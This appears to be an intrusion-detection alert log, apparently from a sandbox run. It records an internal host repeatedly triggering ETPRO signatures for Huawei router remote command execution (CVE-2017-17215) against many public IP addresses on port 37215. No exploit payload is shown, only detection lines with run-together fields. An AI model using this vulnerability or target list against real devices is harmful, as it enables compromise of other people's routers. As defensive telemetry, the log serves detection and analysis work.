                                                    07/10/24-08:26:53.129379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576237215192.168.2.14197.193.139.254
                                                    07/10/24-08:26:42.361617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286837215192.168.2.14197.230.15.220
                                                    07/10/24-08:26:53.202392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654037215192.168.2.1441.113.253.156
                                                    07/10/24-08:26:57.641843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545837215192.168.2.1441.178.183.193
                                                    07/10/24-08:26:57.650012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632437215192.168.2.14157.106.34.39
                                                    07/10/24-08:27:34.127270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416037215192.168.2.14114.47.204.56
                                                    07/10/24-08:27:10.547340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695437215192.168.2.1441.140.236.224
                                                    07/10/24-08:26:23.315814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834437215192.168.2.14197.217.46.82
                                                    07/10/24-08:26:31.069203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681237215192.168.2.1441.211.231.142
                                                    07/10/24-08:26:25.467613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903637215192.168.2.14180.50.237.247
                                                    07/10/24-08:26:26.600322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751837215192.168.2.14107.229.45.106
                                                    07/10/24-08:27:32.574488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326437215192.168.2.14157.40.152.35
                                                    07/10/24-08:26:52.036336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191437215192.168.2.14144.119.180.44
                                                    07/10/24-08:26:52.039541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663837215192.168.2.14133.90.113.202
                                                    07/10/24-08:27:02.825346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234837215192.168.2.1441.83.253.201
                                                    07/10/24-08:26:47.931065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.14157.35.162.76
                                                    07/10/24-08:26:28.827711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536037215192.168.2.14157.37.167.38
                                                    07/10/24-08:26:55.392716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487237215192.168.2.14157.164.188.120
                                                    07/10/24-08:26:43.881879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4567637215192.168.2.14113.210.96.68
                                                    07/10/24-08:26:57.564039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557037215192.168.2.14135.86.212.35
                                                    07/10/24-08:27:22.474549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247437215192.168.2.14197.233.250.94
                                                    07/10/24-08:26:52.081340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825037215192.168.2.14206.148.253.41
                                                    07/10/24-08:27:14.667183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454437215192.168.2.1441.242.107.173
                                                    07/10/24-08:26:31.054322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866837215192.168.2.14157.220.2.95
                                                    07/10/24-08:26:49.853498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588437215192.168.2.14125.190.213.27
                                                    07/10/24-08:26:47.851193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540637215192.168.2.14157.94.215.147
                                                    07/10/24-08:26:55.454904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361037215192.168.2.14157.188.245.135
                                                    07/10/24-08:26:15.878157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858637215192.168.2.14157.19.111.143
                                                    07/10/24-08:26:41.559243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957837215192.168.2.145.172.10.251
                                                    07/10/24-08:26:52.020494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012437215192.168.2.1441.239.14.155
                                                    07/10/24-08:26:43.880984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233237215192.168.2.14197.225.69.238
                                                    07/10/24-08:27:33.821123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904237215192.168.2.14197.135.211.156
                                                    07/10/24-08:27:24.887347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943237215192.168.2.14197.82.183.80
                                                    07/10/24-08:27:31.528141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770837215192.168.2.14157.49.178.5
                                                    07/10/24-08:26:15.845441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631637215192.168.2.14197.67.249.49
                                                    07/10/24-08:26:43.821478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.14197.237.248.246
                                                    07/10/24-08:26:42.370948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752037215192.168.2.1490.105.109.67
                                                    07/10/24-08:27:07.361237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285837215192.168.2.14157.89.52.203
                                                    07/10/24-08:27:22.859417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520037215192.168.2.1441.56.221.16
                                                    07/10/24-08:27:32.526839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319637215192.168.2.14197.44.65.251
                                                    07/10/24-08:27:33.811617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060037215192.168.2.1463.112.20.205
                                                    07/10/24-08:26:52.005613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934637215192.168.2.14157.60.156.143
                                                    07/10/24-08:27:10.621060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309637215192.168.2.1441.174.190.229
                                                    07/10/24-08:26:14.624434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342237215192.168.2.14218.157.32.170
                                                    07/10/24-08:26:52.056548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507237215192.168.2.14157.178.80.245
                                                    07/10/24-08:26:29.819391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184837215192.168.2.1441.239.48.106
                                                    07/10/24-08:27:32.610394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965237215192.168.2.1441.58.175.206
                                                    07/10/24-08:27:14.660199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481037215192.168.2.14197.107.32.167
                                                    07/10/24-08:27:30.443855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533437215192.168.2.1441.179.162.148
                                                    07/10/24-08:26:41.630428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194237215192.168.2.14176.72.16.247
                                                    07/10/24-08:26:55.444062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533837215192.168.2.14157.108.187.191
                                                    07/10/24-08:27:22.835988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003237215192.168.2.14157.67.87.62
                                                    07/10/24-08:26:49.851940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847437215192.168.2.14157.198.8.47
                                                    07/10/24-08:27:23.888639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358237215192.168.2.1441.86.2.138
                                                    07/10/24-08:27:07.384815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5178637215192.168.2.14197.135.249.34
                                                    07/10/24-08:27:32.581630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894637215192.168.2.1474.123.191.215
                                                    07/10/24-08:26:55.417954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.14157.3.6.36
                                                    07/10/24-08:27:10.629706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.1469.96.189.157
                                                    07/10/24-08:27:19.191289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800637215192.168.2.1441.164.144.222
                                                    07/10/24-08:26:43.651509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812637215192.168.2.14157.59.117.99
                                                    07/10/24-08:26:43.678102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3841037215192.168.2.14197.13.127.152
                                                    07/10/24-08:26:44.496105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4477437215192.168.2.1441.108.91.244
                                                    07/10/24-08:26:22.219271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167037215192.168.2.14140.75.80.132
                                                    07/10/24-08:27:11.544699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876637215192.168.2.14197.214.95.9
                                                    07/10/24-08:26:38.533121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720837215192.168.2.14157.185.58.172
                                                    07/10/24-08:26:42.426350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932237215192.168.2.14157.168.69.105
                                                    07/10/24-08:26:55.385605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283237215192.168.2.1441.226.19.45
                                                    07/10/24-08:26:29.780435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559037215192.168.2.1441.136.227.10
                                                    07/10/24-08:26:22.275734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858837215192.168.2.14157.15.30.224
                                                    07/10/24-08:26:15.790225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025437215192.168.2.14157.42.184.41
                                                    07/10/24-08:26:34.228514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3657437215192.168.2.14220.28.40.60
                                                    07/10/24-08:26:57.669251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786437215192.168.2.14197.205.160.11
                                                    07/10/24-08:26:53.213909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438437215192.168.2.14197.146.20.36
                                                    07/10/24-08:26:28.647511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453237215192.168.2.14148.165.128.242
                                                    07/10/24-08:26:38.649954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867637215192.168.2.14197.127.92.141
                                                    07/10/24-08:26:43.900860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784837215192.168.2.14197.24.4.24
                                                    07/10/24-08:26:43.924330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768437215192.168.2.14157.117.23.123
                                                    07/10/24-08:26:55.415648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154437215192.168.2.1441.63.59.40
                                                    07/10/24-08:27:14.846155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527037215192.168.2.14197.215.126.169
                                                    07/10/24-08:26:34.208833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210037215192.168.2.14157.120.31.43
                                                    07/10/24-08:27:02.868135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854637215192.168.2.1483.200.181.91
                                                    07/10/24-08:27:05.183998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601437215192.168.2.14157.40.208.62
                                                    07/10/24-08:26:29.842951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701837215192.168.2.1441.246.45.174
                                                    07/10/24-08:27:05.195980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952437215192.168.2.14157.234.29.234
                                                    07/10/24-08:26:53.121887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939837215192.168.2.14157.145.45.43
                                                    07/10/24-08:27:17.057474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959237215192.168.2.14197.253.143.72
                                                    07/10/24-08:26:45.616284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913637215192.168.2.14110.255.128.166
                                                    07/10/24-08:27:33.970105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718037215192.168.2.14197.205.151.93
                                                    07/10/24-08:27:02.992532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704837215192.168.2.14197.63.51.32
                                                    07/10/24-08:26:29.887224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735437215192.168.2.1441.160.56.165
                                                    07/10/24-08:27:30.450144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719237215192.168.2.14197.209.209.13
                                                    07/10/24-08:26:43.522484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118237215192.168.2.14197.134.124.36
                                                    07/10/24-08:27:10.609289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362037215192.168.2.14157.184.131.245
                                                    07/10/24-08:26:38.610218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492037215192.168.2.14197.110.195.50
                                                    07/10/24-08:27:20.506154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521637215192.168.2.14135.249.16.41
                                                    07/10/24-08:27:27.092607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239837215192.168.2.14157.86.156.68
                                                    07/10/24-08:26:53.124303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619037215192.168.2.1441.236.236.48
                                                    07/10/24-08:27:19.302695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758437215192.168.2.1492.246.87.221
                                                    07/10/24-08:26:43.878190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775637215192.168.2.14157.155.85.207
                                                    07/10/24-08:26:11.587668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418837215192.168.2.14157.249.230.27
                                                    07/10/24-08:26:17.976557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417237215192.168.2.1493.255.64.73
                                                    07/10/24-08:27:10.655556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953437215192.168.2.14197.191.40.61
                                                    07/10/24-08:26:36.362536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5412037215192.168.2.14137.189.32.9
                                                    07/10/24-08:26:17.951763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142637215192.168.2.1485.196.232.76
                                                    07/10/24-08:26:47.941527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053837215192.168.2.14198.87.163.123
                                                    07/10/24-08:26:25.454505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289237215192.168.2.14116.3.228.234
                                                    07/10/24-08:27:07.356358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631637215192.168.2.14157.14.212.92
                                                    07/10/24-08:26:25.511817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672637215192.168.2.14120.68.49.100
                                                    07/10/24-08:26:49.795312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377437215192.168.2.1441.113.8.218
                                                    07/10/24-08:27:05.216046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155237215192.168.2.14157.240.128.90
                                                    07/10/24-08:26:41.571728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5210237215192.168.2.14197.72.124.138
                                                    07/10/24-08:26:59.612938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518237215192.168.2.1441.56.136.40
                                                    07/10/24-08:27:31.522185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4301037215192.168.2.14157.220.106.253
                                                    07/10/24-08:27:19.298148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056037215192.168.2.1474.221.170.99
                                                    07/10/24-08:26:13.654312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171237215192.168.2.14157.39.22.107
                                                    07/10/24-08:27:32.521553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3333637215192.168.2.14162.228.145.144
                                                    07/10/24-08:27:11.556329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733837215192.168.2.1441.64.96.129
                                                    07/10/24-08:26:42.385136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733037215192.168.2.1489.138.26.120
                                                    07/10/24-08:26:41.535361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634637215192.168.2.14170.239.39.102
                                                    07/10/24-08:26:22.286064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086437215192.168.2.14157.43.210.100
                                                    07/10/24-08:27:13.869109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5627437215192.168.2.1441.159.31.57
                                                    07/10/24-08:26:38.601191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348637215192.168.2.14157.39.18.103
                                                    07/10/24-08:27:30.468410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606237215192.168.2.14197.141.54.149
                                                    07/10/24-08:26:18.028864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595837215192.168.2.1441.184.113.250
                                                    07/10/24-08:26:22.234901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298637215192.168.2.1465.88.39.16
                                                    07/10/24-08:26:14.806143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401237215192.168.2.14197.79.166.170
                                                    07/10/24-08:26:43.778762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995037215192.168.2.1441.148.118.183
                                                    07/10/24-08:26:38.613798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035037215192.168.2.1441.0.3.38
                                                    07/10/24-08:27:22.929011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160037215192.168.2.1441.177.190.141
                                                    07/10/24-08:26:22.283182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064637215192.168.2.14157.23.0.167
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316437215192.168.2.14157.145.26.87
                                                    07/10/24-08:26:55.406930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782437215192.168.2.14157.52.110.243
                                                    07/10/24-08:27:11.525645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999437215192.168.2.14157.115.107.237
                                                    07/10/24-08:26:31.103598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630237215192.168.2.14157.1.68.162
                                                    07/10/24-08:26:38.592114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4336837215192.168.2.14197.21.28.75
                                                    07/10/24-08:26:28.795318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797237215192.168.2.14157.216.9.120
                                                    07/10/24-08:26:14.822403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458437215192.168.2.14141.166.114.81
                                                    07/10/24-08:26:31.078993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550037215192.168.2.1441.220.122.83
                                                    07/10/24-08:26:47.974883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092637215192.168.2.14204.190.110.106
                                                    07/10/24-08:26:36.373658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615437215192.168.2.14187.195.102.4
                                                    07/10/24-08:27:24.933902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453837215192.168.2.1459.55.183.24
                                                    07/10/24-08:26:55.418151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533637215192.168.2.14157.218.224.161
                                                    07/10/24-08:27:23.905931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124437215192.168.2.14157.212.204.230
                                                    07/10/24-08:26:15.867804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070037215192.168.2.1441.66.30.34
                                                    07/10/24-08:26:45.632406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365037215192.168.2.14197.226.48.104
                                                    07/10/24-08:27:23.452507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676637215192.168.2.1441.33.103.84
                                                    07/10/24-08:26:36.401394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499437215192.168.2.14197.18.220.39
                                                    07/10/24-08:26:33.265037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074037215192.168.2.1441.29.78.98
                                                    07/10/24-08:26:59.519800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244837215192.168.2.14157.61.161.8
                                                    07/10/24-08:26:11.572202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306637215192.168.2.1441.50.45.78
                                                    07/10/24-08:26:31.105929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669837215192.168.2.1441.234.57.230
                                                    07/10/24-08:27:22.505439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787237215192.168.2.14197.214.92.210
                                                    07/10/24-08:26:33.231077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249837215192.168.2.14118.44.66.210
                                                    07/10/24-08:26:59.646410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3908637215192.168.2.14197.223.24.65
                                                    07/10/24-08:27:31.448205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344037215192.168.2.1441.40.7.225
                                                    07/10/24-08:27:07.401742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321437215192.168.2.14197.6.242.107
                                                    07/10/24-08:27:20.471536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5248237215192.168.2.14157.58.195.91
                                                    07/10/24-08:26:20.153663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371437215192.168.2.14157.222.47.0
                                                    07/10/24-08:27:27.063011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861837215192.168.2.14197.255.90.72
                                                    07/10/24-08:26:59.883274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932037215192.168.2.14197.116.176.158
                                                    07/10/24-08:27:13.985785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293837215192.168.2.1441.134.176.67
                                                    07/10/24-08:26:20.139461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430037215192.168.2.14197.128.223.165
                                                    07/10/24-08:26:11.198321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926237215192.168.2.14197.225.60.127
                                                    07/10/24-08:26:23.297905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871837215192.168.2.14163.76.106.6
                                                    07/10/24-08:26:55.424218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806837215192.168.2.14157.56.251.114
                                                    07/10/24-08:27:22.810148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770237215192.168.2.14149.44.145.217
                                                    07/10/24-08:26:17.999719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152237215192.168.2.14197.49.124.79
                                                    07/10/24-08:26:55.386958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.1441.224.173.0
                                                    07/10/24-08:26:47.774106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512237215192.168.2.1441.63.231.153
                                                    07/10/24-08:26:25.435819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047237215192.168.2.14197.3.232.129
                                                    07/10/24-08:26:22.207242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073637215192.168.2.14112.202.187.90
                                                    07/10/24-08:26:22.298468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262837215192.168.2.14159.246.131.186
                                                    07/10/24-08:26:49.805817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954037215192.168.2.14197.59.237.104
                                                    07/10/24-08:26:41.491692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144837215192.168.2.14197.70.254.155
                                                    07/10/24-08:26:20.122703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761037215192.168.2.14197.114.179.75
                                                    07/10/24-08:26:20.152800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238837215192.168.2.1441.137.10.96
                                                    07/10/24-08:27:33.753390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666437215192.168.2.14197.26.96.22
                                                    07/10/24-08:26:15.864839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372637215192.168.2.1412.222.37.72
                                                    07/10/24-08:27:23.870319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331237215192.168.2.14157.11.140.202
                                                    07/10/24-08:26:23.326882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156837215192.168.2.14197.193.151.203
                                                    07/10/24-08:26:28.911510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739837215192.168.2.14157.224.243.197
                                                    07/10/24-08:27:20.494991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.14157.210.102.135
                                                    07/10/24-08:26:17.986594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584237215192.168.2.14197.20.120.184
                                                    07/10/24-08:26:33.156135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879437215192.168.2.14141.202.80.127
                                                    07/10/24-08:27:17.048975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872637215192.168.2.1423.103.11.115
                                                    07/10/24-08:26:29.820536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860437215192.168.2.14157.167.69.200
